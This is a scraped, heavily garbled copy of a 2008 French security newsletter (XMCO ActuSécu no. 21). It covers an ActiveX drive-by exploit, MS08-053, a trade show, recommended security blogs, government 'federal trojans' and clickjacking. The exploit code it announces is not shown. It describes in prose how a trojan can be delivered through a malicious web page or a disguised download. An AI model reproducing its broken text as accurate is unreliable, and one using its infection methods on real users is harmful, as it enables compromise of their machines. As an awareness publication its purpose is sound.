dcouverte au sein de l'ActiveX Snapview. (changement du shell code).
Le problme rsulte d'une erreur de conception du

contrleur ActiveX snapview.ocx intgr dans toutes
les versions de Microsoft Office Access (sauf dans la
version 2007).
L'exploit dvelopp en langage C permet de gnrer

une page web malicieuse. En incitant un utilisateur
visiter cette page, un pirate peut forcer sa victime
tlcharger un fichier vrol (cheval de Troie).
Voici le code de l'exploit :
Note : Il est important de noter que Windows Media

Encoder 9 n'est pas install par dfaut sur Windows. De
plus, le contrle ActiveX en question est bloqu par
Internet Explorer 7.
Le second code tire profit de la vulnrabilit MS08-053,

dcouverte dans le programme Windows Media
Encoder le 10 septembre dernier.

LACTU SCU N21
Le Salon Info Security
Depuis 9 ans, le salon Info

Security propose tous les
spcialistes de la scurit de
de rencontrer autour de stands
et confrences en tout genre.
Cette anne, Info Security

revient la Porte de
Versailles avec des
confrences intressantes.
XMCO | Partners
Comme chaque anne, le Salon InfoSecurity revient les pourquoi Frdric Charpentier exposera diffrents
19 et 20 novembre 208 la Porte de Versailles. exemples dont on t victimes certains acteurs du
Les salons professionnels Infosecurity et Storage expo march.
2008 vous proposent de rencontrer tous les acteurs de Vous pouvez faire une demande de badge ladresse
la scurit informatique. suivante :
http://www.infosecurity.com.fr/FR/badge?ref=XMCW
Autour de 130 stands, vous retrouverez tous les
revendeurs, les experts et les consultants scurit...
Des confrences seront galement proposes

gratuitement. Vous retrouverez de nombreux vendeurs
de solutions (Websense, Qualys, BitDefender,

LanDesk, Fortinet...) et quelques confrences menes
par des cabinets de conseil comme Lexsi
(Lextraordinaire mutation des malwares et Le Plan de
continuit dactivit).
XMCO aura galement lhonneur de participer ce

salon en prsentant des cas rels de hacking dans le
monde des banques et Assurances (lien suivant).
La scurit informatique dans les banques et

assurances est plus que jamais dactualit, cest

LACTU SCU N21
BLOGS SECURITE Liste des blogs Scurit
Chaque mois, nous vous

prsentons, dans cette
rubrique, des outils libres,
extensions Firefox ou encore
nos sites web prfrs.
Ce mois-ci nous avons choisi

de vous prsenter des sites
web ou plutt des blogs ddis
la scurit informatique.
En vous abonnant aux flux RSS

de ces chercheurs ou experts,
vous pourrez facilement suivre
lvolution des attaques et
des rflexions autour de la
scurit informatique...
XMCO | Partners
Les blogs des chercheurs ou des consultants scurit sont nombreux... Ce chapitre va donc vous prsenter nos Blogs
prfrs des acteurs de la scurit les plus renomms.
Nous continuerons, dans nos prochains numros, cette srie de blogs qui ravira la plupart de nos lecteurs...
Au programme de ce mois :
Billy Rios (xs-sniper.com) : chercheur amricain au sein de la socit

Microsoft
Robert Hansen (ha.ckers.org) : directeur technique de la socit

SecTheory
Cdric Blancher (sid.rstack.org) : chercheur franais chez EADS WWW.XMCOPARTNERS.COM
Et pour les autres, rendez-vous dans le prochain numro...

LACTU SCU N21
Billy Rios (bk)

xs-sniper.com
Description Bily Rios est ingnieur scurit pour la socit Microsoft. Prsent
chaque anne la Blackhat pour prsenter des sujets toujours plus
intressants les uns que les autres, Billy revient (quand son emploi
du temps le lui permet) sur les nouvelles tendances scurit du
moment.
Son exprience et ses analyses permettent de comprendre
facilement les nouveaux vecteurs dattaques...
Capture dcran
Adresse http://xs-sniper.com/blog
Avis XMCO
Le blog de Billy RIOS est intressant. Le sujets abords sont varis
et les contenus toujours passionnants.

LACTU SCU N21
Robert Hansen (rsnake)

ha.ckers.org
Description Robert Hansen nest plus prsenter. Pour certains dentre vous le
pseudonyme Rsnake vous parle peut tre davantage.
Robert Hansen est le fondateur du clbre site ha.ckers.org.
Chaque semaine, rsnake nous fait part de son avis sur de nouvelles
attaques web.
Capture dcran
Adresse http://ha.ckers.org
Avis XMCO Ha.ckers.org est un trs bon blog tenu jour et qui aborde toujours
des sujets passionnants. De nombreux fans commentent et
participent aux rflexions sur les sujets proposs toujours avec les
commentaires du chercheur.
De plus, Rsnake donne quelques astuces dans ses cheat-sheets. A

voir!

LACTU SCU N21
Cdric Blancher (sid)

sid.rstack.org
Description Cdric Blancher (sid) est chercheur et responsable du dpartement
de recherche en scurit de la socit EADS. Il intervient
rgulirement dans des articles du journal MISC.
A travers son blog, Cdric nous fait part de certaines de ses
recherches mais ragit surtout sur lactualit scurit du moment.
Vous trouverez notamment les rsums des grandes confrences
internationales o il est difficile de le louper...
Capture dcran
Adresse http://sid.rstack.org/blog/
Avis XMCO Le blog de Cdric Blancher est un de nos favoris. Les sujets
abords sont divers et varis et le ton de ses interventions nous
sduit toujours.
A travers ce blog, vous entrerez dans la vie dun expert scurit :

voyages, confrences internationales et recherche. De quoi faire

plus dun envieux!

LACTU SCU N21
propos de lActuScu
LActuScu est un magazine numrique rdig et dit par les consultants du cabinet de conseil Xmco Partners.
Sa vocation est de fournir des prsentations claires et dtailles sur le thme de la scurit informatique, en toute
indpendance. Il sagit de notre newsletter.
Tous les numros de lActuScu sont tlchargeables ladresse suivante:

http://www.xmcopartners.com/actualite-securite-vulnerabilite-fr.html
propos du cabinet Xmco Partners
Fonds en 2002 par des experts en scurit, dirige par ses fondateurs, nous
n'intervenons que sous forme de projets forfaitaires avec engagement de rsultats.
Les tests d'intrusion, les audits de scurit, la veille en vulnrabilit constituent
les axes majeurs de dveloppement de notre cabinet.
Paralllement, nous intervenons auprs de Directions Gnrales dans le cadre de

missions daccompagnement de RSSI, dlaboration de schma directeur ou
encore de sminaires de sensibilisation auprs de plusieurs grands comptes franais.
Contacter le cabinet Xmco Partners
Pour contacter le cabinet Xmco Partners et obtenir des informations sur notre mtier : 01 47 34 68 61.
Notre site web : http://www.xmcopartners.com/


XMCO ActuSecu 21 FederalTrojan

Transféré par

Informations du document

Copyright

Formats disponibles

Partager ce document

Partager ou intégrer le document

Options de partage

Avez-vous trouvé ce document utile ?

Ce contenu est-il inapproprié ?

Droits d'auteur :

Formats disponibles

XMCO ActuSecu 21 FederalTrojan

Transféré par

Droits d'auteur :

Formats disponibles

LACTUSCU 21 XMCO | PARTNERS

FEDERAL TROJAN ET CLICKJACKING

L e C lickJ a c k ing : une a t t a qu e a u s s i s im p le q u e ff ic a c e

L e S urfja c k ing : l e xpl o i t a t io n d e s c o o k ie s n o n s c u r is s

L act ualit du m ois : l e s fa ke AV, le s e x p lo its A c tiv e X , la f a ille B GP...

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

propos du cabinet Xmco Partners

Pour contacter le cabinet Xmco Partners et dcouvrir nos prestations : http://www.xmcopartners.com/

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Les Federal Trojans......................................4 LActualit scurit du mois......................25

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Les Federal Trojan : les coutes et

Lors de la grande messe

Derrire ce concept se cache un

FEDERAL TROJAN XMCO | Partners

Lhistorique Lorsque l'on parle de Backdoor ou de Trojan, on parle

Dead Cow". Cette Backdoor, prsente sous la forme

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Si l'on devait tablir une liste des besoins des

l'poque, Symantec, l'diteur de Norton Antivirus,

Depuis la Magic Lantern, le FBI a continu de

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Les gouvernements sudois et autrichien ont En Allemagne, la socit Digitask

Cette offre fait suite au dsir de

La fin des coutes classiques

Bien que l'tat chinois ait rsolu le problme de Skype

En particulier - et mme si le mythe des cls de

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

1) La mthode "rentre dedans" : un fichier excutable

suspect ouvrir le programme.

2) L'insertion du Trojan dans un tlchargement

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Il s'agit ici de la fonctionnalit de base d'un Trojan

l'quivalent d'un Google Desktop ou d'un Apple

Le Trojan devra galement tre capable de rechercher

Lidentification et la localisation du suspect

Envoyer ou Ne pas envoyer

Qui ne sait jamais demand, lors du Enime plantage

Si l'IP source n'est pas suffisant, ce qui risque d'tre le

Enfin, la localisation d'un suspect peut tre assez

Il existe un grand nombre de traces dans un

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Un Trojan multiplateforme Java ?

Est-il possible de construire un Trojan suffisamment

Bien que les coutes tlphoniques GSM soient

quand le premier Trojan (fdral ou non) pour

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Dans un second email pour semer la terreur dans le

A la demande du FBI, Google fournit les logs

Le rapport complet de Norman

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Enfin, le Trojan doit forcement communiquer avec un

Et la France dans tout a?

Nous en arrivons la question sous-jacente de cet

Restent ensuite toutes les difficults d'ordre lgal : en

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Ensuite, la CNIL serait-elle consulte ? La commission Conclusion

Concrtement, la police va pouvoir saisir (et accder

Le dcret N2106-358 du 24 mars 2006, impose

dsormais aux FAI (Fournisseurs d'Accs l'Internet)

En dcembre 2007, la loi LOPSI n2 fait grand bruit

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Le Clickjacking : une nouvelle attaque

LE CLICKJACKING Quelques semaines